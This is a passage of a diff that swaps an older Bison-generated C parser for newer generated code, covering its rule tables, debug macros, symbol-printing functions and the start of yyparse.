347, 347, 348, 348, 348, 348, 348, 348, 349, ++ 349, 349, 349, 349, 349, 349, 350, 351, 351, 352, ++ 352, 353, 353, 354, 355, 355, 356, 356, 356, 356, ++ 356, 356, 356, 356, 356, 357, 357, 357, 358, 358, ++ 360, 361, 359, 363, 362, 364, 366, 367, 365, 368, ++ 368, 369, 369, 370, 371, 371, 371, 371, 372, 372, ++ 373, 373, 373, 374, 374, 374, 374, 374, 374, 374, ++ 374, 374, 374, 374, 374, 374, 374, 374, 374, 374, ++ 374, 374, 374, 374, 374, 374, 374, 374, 374, 374, ++ 374, 374, 374, 374, 374, 374, 374, 374, 375, 376, ++ 377, 377, 378, 378, 378, 379, 379, 380, 380, 381, ++ 381, 381, 382, 382, 383, 383, 385, 384, 384, 386, ++ 388, 387, 387, 389, 390, 391, 390, 392, 393, 392, ++ 394, 394, 394, 394, 395, 395, 395, 395, 395, 395, ++ 395, 395, 395, 395, 395, 395, 395, 395, 395, 395, ++ 395, 395, 395, 395, 395, 395, 395, 395, 395, 395, ++ 395, 395, 395, 396, 396, 397, 397, 398, 398, 399, ++ 399, 400, 400, 401, 401, 402, 402, 402, 402, 403, ++ 403, 404, 404, 405, 405, 406, 406, 407, 408, 408, ++ 408, 409, 409, 409, 409, 409, 409, 409, 409, 409, ++ 411, 410, 412, 410, 410, 414, 413, 413, 415, 415, ++ 417, 416, 416, 418, 419, 419, 420, 420, 421, 421, ++ 421, 421, 421, 422, 422, 423, 424, 424, 425, 425, ++ 425, 426, 426, 426, 426, 426, 
426, 426, 426, 426, ++ 426, 426, 426, 426, 426, 426, 426, 426, 426, 426, ++ 426, 426, 426, 426, 426, 426, 426, 426, 426, 426, ++ 426, 426, 427, 427, 428, 428, 429, 429, 429 ++}; + +-/* Like YYERROR except do call yyerror. This remains here temporarily +- to ease the transition to the new meaning of YYERROR, for GCC. +- Once GCC version 2 has supplanted version 1, this can go. */ ++/* YYR2[RULE-NUM] -- Number of symbols on the right-hand side of rule RULE-NUM. */ ++static const yytype_int8 yyr2[] = ++{ ++ 0, 2, 1, 2, 0, 2, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 2, 1, 3, 1, ++ 3, 3, 2, 1, 3, 1, 3, 3, 2, 1, ++ 3, 1, 3, 3, 2, 1, 3, 1, 3, 3, ++ 3, 1, 3, 1, 3, 3, 2, 2, 3, 1, ++ 3, 3, 3, 5, 0, 3, 4, 1, 2, 1, ++ 1, 1, 1, 2, 0, 5, 0, 6, 4, 1, ++ 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, ++ 14, 0, 5, 0, 3, 1, 2, 0, 5, 1, ++ 2, 1, 2, 1, 3, 1, 3, 3, 0, 5, ++ 1, 2, 1, 0, 5, 1, 2, 3, 4, 1, ++ 3, 1, 3, 0, 1, 3, 1, 3, 3, 3, ++ 3, 3, 2, 1, 3, 1, 3, 3, 2, 1, ++ 3, 1, 3, 3, 2, 1, 3, 1, 3, 3, ++ 3, 1, 3, 1, 3, 3, 0, 4, 1, 2, ++ 1, 1, 1, 3, 1, 3, 1, 3, 3, 0, ++ 4, 1, 2, 1, 1, 1, 3, 3, 0, 3, ++ 3, 1, 3, 3, 3, 3, 3, 3, 3, 3, ++ 3, 3, 3, 0, 4, 1, 2, 1, 1, 1, ++ 1, 1, 1, 0, 1, 2, 1, 3, 1, 3, ++ 3, 3, 2, 2, 1, 3, 1, 3, 3, 0, ++ 2, 0, 2, 0, 2, 2, 2, 2, 2, 2, ++ 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, ++ 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, ++ 2, 2, 2, 2, 3, 1, 3, 3, 3, 0, ++ 1, 3, 1, 3, 3, 3, 0, 1, 3, 1, ++ 3, 1, 3, 3, 3, 4, 2, 1, 2, 0, ++ 9, 0, 1, 1, 0, 1, 0, 1, 0, 1, ++ 1, 2, 1, 1, 4, 0, 1, 0, 2, 0, ++ 2, 1, 3, 1, 1, 1, 1, 1, 1, 0, ++ 1, 1, 1, 1, 1, 1, 3, 0, 3, 2, ++ 1, 1, 3, 1, 1, 1, 1, 4, 2, 1, ++ 1, 1, 1, 1, 1, 0, 1, 3, 6, 12, ++ 0, 0, 8, 0, 3, 4, 0, 0, 8, 0, ++ 2, 1, 3, 2, 0, 1, 1, 1, 0, 3, ++ 0, 1, 2, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 2, 2, 2, 3, 3, 3, 2, 3, 3, ++ 1, 3, 3, 3, 3, 0, 4, 1, 2, 1, ++ 1, 1, 1, 1, 0, 1, 0, 3, 1, 11, ++ 
0, 3, 1, 11, 0, 0, 6, 0, 0, 7, ++ 17, 7, 17, 16, 1, 1, 1, 1, 1, 1, ++ 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, ++ 2, 2, 3, 3, 1, 2, 2, 1, 2, 2, ++ 2, 1, 2, 0, 1, 0, 1, 0, 2, 0, ++ 3, 1, 3, 1, 3, 1, 5, 1, 1, 0, ++ 2, 0, 2, 0, 2, 0, 2, 1, 0, 1, ++ 3, 4, 4, 4, 3, 3, 6, 6, 3, 2, ++ 0, 3, 0, 3, 1, 0, 3, 1, 1, 1, ++ 0, 3, 1, 8, 0, 3, 1, 2, 1, 1, ++ 2, 2, 2, 4, 3, 3, 0, 1, 0, 3, ++ 2, 1, 4, 2, 2, 1, 1, 2, 1, 1, ++ 2, 2, 3, 1, 1, 1, 2, 2, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 3, 0, 4, 0, 1, 3 ++}; + +-#define YYFAIL goto yyerrlab + +-#define YYRECOVERING() (!!yyerrstatus) ++enum { YYENOMEM = -2 }; + +-#define YYBACKUP(Token, Value) \ +-do \ +- if (yychar == YYEMPTY && yylen == 1) \ +- { \ +- yychar = (Token); \ +- yylval = (Value); \ +- yytoken = YYTRANSLATE (yychar); \ +- YYPOPSTACK (1); \ +- goto yybackup; \ +- } \ +- else \ +- { \ +- yyerror (YY_("syntax error: cannot back up")); \ +- YYERROR; \ +- } \ +-while (YYID (0)) +- +- +-#define YYTERROR 1 +-#define YYERRCODE 256 +- +- +-/* YYLLOC_DEFAULT -- Set CURRENT to span from RHS[1] to RHS[N]. +- If N is 0, then set CURRENT to the empty location which ends +- the previous symbol: RHS[0] (always defined). 
*/ +- +-#define YYRHSLOC(Rhs, K) ((Rhs)[K]) +-#ifndef YYLLOC_DEFAULT +-# define YYLLOC_DEFAULT(Current, Rhs, N) \ +- do \ +- if (YYID (N)) \ +- { \ +- (Current).first_line = YYRHSLOC (Rhs, 1).first_line; \ +- (Current).first_column = YYRHSLOC (Rhs, 1).first_column; \ +- (Current).last_line = YYRHSLOC (Rhs, N).last_line; \ +- (Current).last_column = YYRHSLOC (Rhs, N).last_column; \ +- } \ +- else \ +- { \ +- (Current).first_line = (Current).last_line = \ +- YYRHSLOC (Rhs, 0).last_line; \ +- (Current).first_column = (Current).last_column = \ +- YYRHSLOC (Rhs, 0).last_column; \ +- } \ +- while (YYID (0)) +-#endif ++#define yyerrok (yyerrstatus = 0) ++#define yyclearin (yychar = YYEMPTY) + ++#define YYACCEPT goto yyacceptlab ++#define YYABORT goto yyabortlab ++#define YYERROR goto yyerrorlab ++#define YYNOMEM goto yyexhaustedlab + +-/* YY_LOCATION_PRINT -- Print the location on the stream. +- This macro was not mandated originally: define only if we know +- we won't break user code: when these are the locations we know. */ +- +-#ifndef YY_LOCATION_PRINT +-# if defined YYLTYPE_IS_TRIVIAL && YYLTYPE_IS_TRIVIAL +-# define YY_LOCATION_PRINT(File, Loc) \ +- fprintf (File, "%d.%d-%d.%d", \ +- (Loc).first_line, (Loc).first_column, \ +- (Loc).last_line, (Loc).last_column) +-# else +-# define YY_LOCATION_PRINT(File, Loc) ((void) 0) +-# endif +-#endif + ++#define YYRECOVERING() (!!yyerrstatus) + +-/* YYLEX -- calling `yylex' with the right arguments. */ ++#define YYBACKUP(Token, Value) \ ++ do \ ++ if (yychar == YYEMPTY) \ ++ { \ ++ yychar = (Token); \ ++ yylval = (Value); \ ++ YYPOPSTACK (yylen); \ ++ yystate = *yyssp; \ ++ goto yybackup; \ ++ } \ ++ else \ ++ { \ ++ yyerror (YY_("syntax error: cannot back up")); \ ++ YYERROR; \ ++ } \ ++ while (0) ++ ++/* Backward compatibility with an undocumented macro. ++ Use YYerror or YYUNDEF. 
*/ ++#define YYERRCODE YYUNDEF + +-#ifdef YYLEX_PARAM +-# define YYLEX yylex (YYLEX_PARAM) +-#else +-# define YYLEX yylex () +-#endif + + /* Enable debugging if requested. */ + #if YYDEBUG +@@ -2321,80 +2213,58 @@ while (YYID (0)) + # define YYFPRINTF fprintf + # endif + +-# define YYDPRINTF(Args) \ +-do { \ +- if (yydebug) \ +- YYFPRINTF Args; \ +-} while (YYID (0)) +- +-# define YY_SYMBOL_PRINT(Title, Type, Value, Location) \ +-do { \ +- if (yydebug) \ +- { \ +- YYFPRINTF (stderr, "%s ", Title); \ +- yy_symbol_print (stderr, \ +- Type, Value); \ +- YYFPRINTF (stderr, "\n"); \ +- } \ +-} while (YYID (0)) +- +- +-/*--------------------------------. +-| Print this symbol on YYOUTPUT. | +-`--------------------------------*/ +- +-/*ARGSUSED*/ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static void +-yy_symbol_value_print (FILE *yyoutput, int yytype, YYSTYPE const * const yyvaluep) +-#else ++# define YYDPRINTF(Args) \ ++do { \ ++ if (yydebug) \ ++ YYFPRINTF Args; \ ++} while (0) ++ ++ ++ ++ ++# define YY_SYMBOL_PRINT(Title, Kind, Value, Location) \ ++do { \ ++ if (yydebug) \ ++ { \ ++ YYFPRINTF (stderr, "%s ", Title); \ ++ yy_symbol_print (stderr, \ ++ Kind, Value); \ ++ YYFPRINTF (stderr, "\n"); \ ++ } \ ++} while (0) ++ ++ ++/*-----------------------------------. ++| Print this symbol's value on YYO. 
| ++`-----------------------------------*/ ++ + static void +-yy_symbol_value_print (yyoutput, yytype, yyvaluep) +- FILE *yyoutput; +- int yytype; +- YYSTYPE const * const yyvaluep; +-#endif ++yy_symbol_value_print (FILE *yyo, ++ yysymbol_kind_t yykind, YYSTYPE const * const yyvaluep) + { ++ FILE *yyoutput = yyo; ++ YY_USE (yyoutput); + if (!yyvaluep) + return; +-# ifdef YYPRINT +- if (yytype < YYNTOKENS) +- YYPRINT (yyoutput, yytoknum[yytype], *yyvaluep); +-# else +- YYUSE (yyoutput); +-# endif +- switch (yytype) +- { +- default: +- break; +- } ++ YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN ++ YY_USE (yykind); ++ YY_IGNORE_MAYBE_UNINITIALIZED_END + } + + +-/*--------------------------------. +-| Print this symbol on YYOUTPUT. | +-`--------------------------------*/ ++/*---------------------------. ++| Print this symbol on YYO. | ++`---------------------------*/ + +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static void +-yy_symbol_print (FILE *yyoutput, int yytype, YYSTYPE const * const yyvaluep) +-#else + static void +-yy_symbol_print (yyoutput, yytype, yyvaluep) +- FILE *yyoutput; +- int yytype; +- YYSTYPE const * const yyvaluep; +-#endif ++yy_symbol_print (FILE *yyo, ++ yysymbol_kind_t yykind, YYSTYPE const * const yyvaluep) + { +- if (yytype < YYNTOKENS) +- YYFPRINTF (yyoutput, "token %s (", yytname[yytype]); +- else +- YYFPRINTF (yyoutput, "nterm %s (", yytname[yytype]); ++ YYFPRINTF (yyo, "%s %s (", ++ yykind < YYNTOKENS ? "token" : "nterm", yysymbol_name (yykind)); + +- yy_symbol_value_print (yyoutput, yytype, yyvaluep); +- YYFPRINTF (yyoutput, ")"); ++ yy_symbol_value_print (yyo, yykind, yyvaluep); ++ YYFPRINTF (yyo, ")"); + } + + /*------------------------------------------------------------------. +@@ -2402,80 +2272,68 @@ yy_symbol_print (yyoutput, yytype, yyval + | TOP (included). 
| + `------------------------------------------------------------------*/ + +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static void +-yy_stack_print (yytype_int16 *bottom, yytype_int16 *top) +-#else + static void +-yy_stack_print (bottom, top) +- yytype_int16 *bottom; +- yytype_int16 *top; +-#endif ++yy_stack_print (yy_state_t *yybottom, yy_state_t *yytop) + { + YYFPRINTF (stderr, "Stack now"); +- for (; bottom <= top; ++bottom) +- YYFPRINTF (stderr, " %d", *bottom); ++ for (; yybottom <= yytop; yybottom++) ++ { ++ int yybot = *yybottom; ++ YYFPRINTF (stderr, " %d", yybot); ++ } + YYFPRINTF (stderr, "\n"); + } + +-# define YY_STACK_PRINT(Bottom, Top) \ +-do { \ +- if (yydebug) \ +- yy_stack_print ((Bottom), (Top)); \ +-} while (YYID (0)) ++# define YY_STACK_PRINT(Bottom, Top) \ ++do { \ ++ if (yydebug) \ ++ yy_stack_print ((Bottom), (Top)); \ ++} while (0) + + + /*------------------------------------------------. + | Report that the YYRULE is going to be reduced. | + `------------------------------------------------*/ + +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) + static void +-yy_reduce_print (YYSTYPE *yyvsp, int yyrule) +-#else +-static void +-yy_reduce_print (yyvsp, yyrule) +- YYSTYPE *yyvsp; +- int yyrule; +-#endif ++yy_reduce_print (yy_state_t *yyssp, YYSTYPE *yyvsp, ++ int yyrule) + { ++ int yylno = yyrline[yyrule]; + int yynrhs = yyr2[yyrule]; + int yyi; +- unsigned long int yylno = yyrline[yyrule]; +- YYFPRINTF (stderr, "Reducing stack by rule %d (line %lu):\n", +- yyrule - 1, yylno); ++ YYFPRINTF (stderr, "Reducing stack by rule %d (line %d):\n", ++ yyrule - 1, yylno); + /* The symbols being reduced. 
*/ + for (yyi = 0; yyi < yynrhs; yyi++) + { +- fprintf (stderr, " $%d = ", yyi + 1); +- yy_symbol_print (stderr, yyrhs[yyprhs[yyrule] + yyi], +- &(yyvsp[(yyi + 1) - (yynrhs)]) +- ); +- fprintf (stderr, "\n"); ++ YYFPRINTF (stderr, " $%d = ", yyi + 1); ++ yy_symbol_print (stderr, ++ YY_ACCESSING_SYMBOL (+yyssp[yyi + 1 - yynrhs]), ++ &yyvsp[(yyi + 1) - (yynrhs)]); ++ YYFPRINTF (stderr, "\n"); + } + } + +-# define YY_REDUCE_PRINT(Rule) \ +-do { \ +- if (yydebug) \ +- yy_reduce_print (yyvsp, Rule); \ +-} while (YYID (0)) ++# define YY_REDUCE_PRINT(Rule) \ ++do { \ ++ if (yydebug) \ ++ yy_reduce_print (yyssp, yyvsp, Rule); \ ++} while (0) + + /* Nonzero means print parse trace. It is left uninitialized so that + multiple parsers can coexist. */ + int yydebug; + #else /* !YYDEBUG */ +-# define YYDPRINTF(Args) +-# define YY_SYMBOL_PRINT(Title, Type, Value, Location) ++# define YYDPRINTF(Args) ((void) 0) ++# define YY_SYMBOL_PRINT(Title, Kind, Value, Location) + # define YY_STACK_PRINT(Bottom, Top) + # define YY_REDUCE_PRINT(Rule) + #endif /* !YYDEBUG */ + + + /* YYINITDEPTH -- initial size of the parser's stacks. */ +-#ifndef YYINITDEPTH ++#ifndef YYINITDEPTH + # define YYINITDEPTH 200 + #endif + +@@ -2490,478 +2348,219 @@ int yydebug; + # define YYMAXDEPTH 10000 + #endif + +- + +-#if YYERROR_VERBOSE + +-# ifndef yystrlen +-# if defined __GLIBC__ && defined _STRING_H +-# define yystrlen strlen +-# else +-/* Return the length of YYSTR. 
*/ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static YYSIZE_T +-yystrlen (const char *yystr) +-#else +-static YYSIZE_T +-yystrlen (yystr) +- const char *yystr; +-#endif +-{ +- YYSIZE_T yylen; +- for (yylen = 0; yystr[yylen]; yylen++) +- continue; +- return yylen; +-} +-# endif +-# endif + +-# ifndef yystpcpy +-# if defined __GLIBC__ && defined _STRING_H && defined _GNU_SOURCE +-# define yystpcpy stpcpy +-# else +-/* Copy YYSRC to YYDEST, returning the address of the terminating '\0' in +- YYDEST. */ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static char * +-yystpcpy (char *yydest, const char *yysrc) +-#else +-static char * +-yystpcpy (yydest, yysrc) +- char *yydest; +- const char *yysrc; +-#endif +-{ +- char *yyd = yydest; +- const char *yys = yysrc; + +- while ((*yyd++ = *yys++) != '\0') +- continue; +- +- return yyd - 1; +-} +-# endif +-# endif +- +-# ifndef yytnamerr +-/* Copy to YYRES the contents of YYSTR after stripping away unnecessary +- quotes and backslashes, so that it's suitable for yyerror. The +- heuristic is that double-quoting is unnecessary unless the string +- contains an apostrophe, a comma, or backslash (other than +- backslash-backslash). YYSTR is taken from yytname. If YYRES is +- null, do not copy; instead, return the length of what the result +- would have been. */ +-static YYSIZE_T +-yytnamerr (char *yyres, const char *yystr) +-{ +- if (*yystr == '"') +- { +- YYSIZE_T yyn = 0; +- char const *yyp = yystr; +- +- for (;;) +- switch (*++yyp) +- { +- case '\'': +- case ',': +- goto do_not_strip_quotes; +- +- case '\\': +- if (*++yyp != '\\') +- goto do_not_strip_quotes; +- /* Fall through. */ +- default: +- if (yyres) +- yyres[yyn] = *yyp; +- yyn++; +- break; +- +- case '"': +- if (yyres) +- yyres[yyn] = '\0'; +- return yyn; +- } +- do_not_strip_quotes: ; +- } +- +- if (! 
yyres) +- return yystrlen (yystr); +- +- return yystpcpy (yyres, yystr) - yyres; +-} +-# endif +- +-/* Copy into YYRESULT an error message about the unexpected token +- YYCHAR while in state YYSTATE. Return the number of bytes copied, +- including the terminating null byte. If YYRESULT is null, do not +- copy anything; just return the number of bytes that would be +- copied. As a special case, return 0 if an ordinary "syntax error" +- message will do. Return YYSIZE_MAXIMUM if overflow occurs during +- size calculation. */ +-static YYSIZE_T +-yysyntax_error (char *yyresult, int yystate, int yychar) +-{ +- int yyn = yypact[yystate]; +- +- if (! (YYPACT_NINF < yyn && yyn <= YYLAST)) +- return 0; +- else +- { +- int yytype = YYTRANSLATE (yychar); +- YYSIZE_T yysize0 = yytnamerr (0, yytname[yytype]); +- YYSIZE_T yysize = yysize0; +- YYSIZE_T yysize1; +- int yysize_overflow = 0; +- enum { YYERROR_VERBOSE_ARGS_MAXIMUM = 5 }; +- char const *yyarg[YYERROR_VERBOSE_ARGS_MAXIMUM]; +- int yyx; +- +-# if 0 +- /* This is so xgettext sees the translatable formats that are +- constructed on the fly. */ +- YY_("syntax error, unexpected %s"); +- YY_("syntax error, unexpected %s, expecting %s"); +- YY_("syntax error, unexpected %s, expecting %s or %s"); +- YY_("syntax error, unexpected %s, expecting %s or %s or %s"); +- YY_("syntax error, unexpected %s, expecting %s or %s or %s or %s"); +-# endif +- char *yyfmt; +- char const *yyf; +- static char const yyunexpected[] = "syntax error, unexpected %s"; +- static char const yyexpecting[] = ", expecting %s"; +- static char const yyor[] = " or %s"; +- char yyformat[sizeof yyunexpected +- + sizeof yyexpecting - 1 +- + ((YYERROR_VERBOSE_ARGS_MAXIMUM - 2) +- * (sizeof yyor - 1))]; +- char const *yyprefix = yyexpecting; +- +- /* Start YYX at -YYN if negative to avoid negative indexes in +- YYCHECK. */ +- int yyxbegin = yyn < 0 ? -yyn : 0; +- +- /* Stay within bounds of both yycheck and yytname. 
*/ +- int yychecklim = YYLAST - yyn + 1; +- int yyxend = yychecklim < YYNTOKENS ? yychecklim : YYNTOKENS; +- int yycount = 1; +- +- yyarg[0] = yytname[yytype]; +- yyfmt = yystpcpy (yyformat, yyunexpected); +- +- for (yyx = yyxbegin; yyx < yyxend; ++yyx) +- if (yycheck[yyx + yyn] == yyx && yyx != YYTERROR) +- { +- if (yycount == YYERROR_VERBOSE_ARGS_MAXIMUM) +- { +- yycount = 1; +- yysize = yysize0; +- yyformat[sizeof yyunexpected - 1] = '\0'; +- break; +- } +- yyarg[yycount++] = yytname[yyx]; +- yysize1 = yysize + yytnamerr (0, yytname[yyx]); +- yysize_overflow |= (yysize1 < yysize); +- yysize = yysize1; +- yyfmt = yystpcpy (yyfmt, yyprefix); +- yyprefix = yyor; +- } +- +- yyf = YY_(yyformat); +- yysize1 = yysize + yystrlen (yyf); +- yysize_overflow |= (yysize1 < yysize); +- yysize = yysize1; +- +- if (yysize_overflow) +- return YYSIZE_MAXIMUM; +- +- if (yyresult) +- { +- /* Avoid sprintf, as that infringes on the user's name space. +- Don't have undefined behavior even if the translation +- produced a string with the wrong number of "%s"s. */ +- char *yyp = yyresult; +- int yyi = 0; +- while ((*yyp = *yyf) != '\0') +- { +- if (*yyp == '%' && yyf[1] == 's' && yyi < yycount) +- { +- yyp += yytnamerr (yyp, yyarg[yyi++]); +- yyf += 2; +- } +- else +- { +- yyp++; +- yyf++; +- } +- } +- } +- return yysize; +- } +-} +-#endif /* YYERROR_VERBOSE */ +- + + /*-----------------------------------------------. + | Release the memory associated to this symbol. 
| + `-----------------------------------------------*/ + +-/*ARGSUSED*/ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static void +-yydestruct (const char *yymsg, int yytype, YYSTYPE *yyvaluep) +-#else + static void +-yydestruct (yymsg, yytype, yyvaluep) +- const char *yymsg; +- int yytype; +- YYSTYPE *yyvaluep; +-#endif ++yydestruct (const char *yymsg, ++ yysymbol_kind_t yykind, YYSTYPE *yyvaluep) + { +- YYUSE (yyvaluep); +- ++ YY_USE (yyvaluep); + if (!yymsg) + yymsg = "Deleting"; +- YY_SYMBOL_PRINT (yymsg, yytype, yyvaluep, yylocationp); +- +- switch (yytype) +- { ++ YY_SYMBOL_PRINT (yymsg, yykind, yyvaluep, yylocationp); + +- default: +- break; +- } ++ YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN ++ YY_USE (yykind); ++ YY_IGNORE_MAYBE_UNINITIALIZED_END + } +- +- +-/* Prevent warnings from -Wmissing-prototypes. */ +- +-#ifdef YYPARSE_PARAM +-#if defined __STDC__ || defined __cplusplus +-int yyparse (void *YYPARSE_PARAM); +-#else +-int yyparse (); +-#endif +-#else /* ! YYPARSE_PARAM */ +-#if defined __STDC__ || defined __cplusplus +-int yyparse (void); +-#else +-int yyparse (); +-#endif +-#endif /* ! YYPARSE_PARAM */ +- + + +-/* The look-ahead symbol. */ ++/* Lookahead token kind. */ + int yychar; + +-/* The semantic value of the look-ahead symbol. */ ++/* The semantic value of the lookahead symbol. */ + YYSTYPE yylval; +- + /* Number of syntax errors so far. */ + int yynerrs; + + + ++ + /*----------. + | yyparse. | + `----------*/ + +-#ifdef YYPARSE_PARAM +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-int +-yyparse (void *YYPARSE_PARAM) +-#else +-int +-yyparse (YYPARSE_PARAM) +- void *YYPARSE_PARAM; +-#endif +-#else /* ! 
YYPARSE_PARAM */ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) + int + yyparse (void) +-#else +-int +-yyparse () +- +-#endif +-#endif + { +- +- int yystate; ++ yy_state_fast_t yystate = 0; ++ /* Number of tokens to shift before error messages enabled. */ ++ int yyerrstatus = 0; ++ ++ /* Refer to the stacks through separate pointers, to allow yyoverflow ++ to reallocate them elsewhere. */ ++ ++ /* Their size. */ ++ YYPTRDIFF_T yystacksize = YYINITDEPTH; ++ ++ /* The state stack: array, bottom, top. */ ++ yy_state_t yyssa[YYINITDEPTH]; ++ yy_state_t *yyss = yyssa; ++ yy_state_t *yyssp = yyss; ++ ++ /* The semantic value stack: array, bottom, top. */ ++ YYSTYPE yyvsa[YYINITDEPTH]; ++ YYSTYPE *yyvs = yyvsa; ++ YYSTYPE *yyvsp = yyvs; ++ + int yyn; ++ /* The return value of yyparse. */ + int yyresult; +- /* Number of tokens to shift before error messages enabled. */ +- int yyerrstatus; +- /* Look-ahead token as an internal (translated) token number. */ +- int yytoken = 0; +-#if YYERROR_VERBOSE +- /* Buffer for error messages, and its allocated size. */ +- char yymsgbuf[128]; +- char *yymsg = yymsgbuf; +- YYSIZE_T yymsg_alloc = sizeof yymsgbuf; +-#endif +- +- /* Three stacks and their tools: +- `yyss': related to states, +- `yyvs': related to semantic values, +- `yyls': related to locations. +- +- Refer to the stacks thru separate pointers, to allow yyoverflow +- to reallocate them elsewhere. */ +- +- /* The state stack. */ +- yytype_int16 yyssa[YYINITDEPTH]; +- yytype_int16 *yyss = yyssa; +- yytype_int16 *yyssp; +- +- /* The semantic value stack. */ +- YYSTYPE yyvsa[YYINITDEPTH]; +- YYSTYPE *yyvs = yyvsa; +- YYSTYPE *yyvsp; +- +- +- +-#define YYPOPSTACK(N) (yyvsp -= (N), yyssp -= (N)) +- +- YYSIZE_T yystacksize = YYINITDEPTH; +- ++ /* Lookahead symbol kind. */ ++ yysymbol_kind_t yytoken = YYSYMBOL_YYEMPTY; + /* The variables used to return semantic value and location from the + action routines. 
*/ + YYSTYPE yyval; + + ++ ++#define YYPOPSTACK(N) (yyvsp -= (N), yyssp -= (N)) ++ + /* The number of symbols on the RHS of the reduced rule. + Keep to zero when no symbol should be popped. */ + int yylen = 0; + + YYDPRINTF ((stderr, "Starting parse\n")); + +- yystate = 0; +- yyerrstatus = 0; +- yynerrs = 0; +- yychar = YYEMPTY; /* Cause a token to be read. */ +- +- /* Initialize stack pointers. +- Waste one element of value and location stack +- so that they stay on the same level as the state stack. +- The wasted elements are never initialized. */ +- +- yyssp = yyss; +- yyvsp = yyvs; ++ yychar = YYEMPTY; /* Cause a token to be read. */ + + goto yysetstate; + ++ + /*------------------------------------------------------------. +-| yynewstate -- Push a new state, which is found in yystate. | ++| yynewstate -- push a new state, which is found in yystate. | + `------------------------------------------------------------*/ +- yynewstate: ++yynewstate: + /* In all cases, when you get here, the value and location stacks + have just been pushed. So pushing a state here evens the stacks. */ + yyssp++; + +- yysetstate: +- *yyssp = yystate; ++ ++/*--------------------------------------------------------------------. ++| yysetstate -- set current state (the top of the stack) to yystate. | ++`--------------------------------------------------------------------*/ ++yysetstate: ++ YYDPRINTF ((stderr, "Entering state %d\n", yystate)); ++ YY_ASSERT (0 <= yystate && yystate < YYNSTATES); ++ YY_IGNORE_USELESS_CAST_BEGIN ++ *yyssp = YY_CAST (yy_state_t, yystate); ++ YY_IGNORE_USELESS_CAST_END ++ YY_STACK_PRINT (yyss, yyssp); + + if (yyss + yystacksize - 1 <= yyssp) ++#if !defined yyoverflow && !defined YYSTACK_RELOCATE ++ YYNOMEM; ++#else + { + /* Get the current used size of the three stacks, in elements. 
*/ +- YYSIZE_T yysize = yyssp - yyss + 1; ++ YYPTRDIFF_T yysize = yyssp - yyss + 1; + +-#ifdef yyoverflow ++# if defined yyoverflow + { +- /* Give user a chance to reallocate the stack. Use copies of +- these so that the &'s don't force the real ones into +- memory. */ +- YYSTYPE *yyvs1 = yyvs; +- yytype_int16 *yyss1 = yyss; +- +- +- /* Each stack pointer address is followed by the size of the +- data in use in that stack, in bytes. This used to be a +- conditional around just the two extra args, but that might +- be undefined if yyoverflow is a macro. */ +- yyoverflow (YY_("memory exhausted"), +- &yyss1, yysize * sizeof (*yyssp), +- &yyvs1, yysize * sizeof (*yyvsp), +- +- &yystacksize); +- +- yyss = yyss1; +- yyvs = yyvs1; ++ /* Give user a chance to reallocate the stack. Use copies of ++ these so that the &'s don't force the real ones into ++ memory. */ ++ yy_state_t *yyss1 = yyss; ++ YYSTYPE *yyvs1 = yyvs; ++ ++ /* Each stack pointer address is followed by the size of the ++ data in use in that stack, in bytes. This used to be a ++ conditional around just the two extra args, but that might ++ be undefined if yyoverflow is a macro. */ ++ yyoverflow (YY_("memory exhausted"), ++ &yyss1, yysize * YYSIZEOF (*yyssp), ++ &yyvs1, yysize * YYSIZEOF (*yyvsp), ++ &yystacksize); ++ yyss = yyss1; ++ yyvs = yyvs1; + } +-#else /* no yyoverflow */ +-# ifndef YYSTACK_RELOCATE +- goto yyexhaustedlab; +-# else ++# else /* defined YYSTACK_RELOCATE */ + /* Extend the stack our own way. */ + if (YYMAXDEPTH <= yystacksize) +- goto yyexhaustedlab; ++ YYNOMEM; + yystacksize *= 2; + if (YYMAXDEPTH < yystacksize) +- yystacksize = YYMAXDEPTH; ++ yystacksize = YYMAXDEPTH; + + { +- yytype_int16 *yyss1 = yyss; +- union yyalloc *yyptr = +- (union yyalloc *) YYSTACK_ALLOC (YYSTACK_BYTES (yystacksize)); +- if (! 
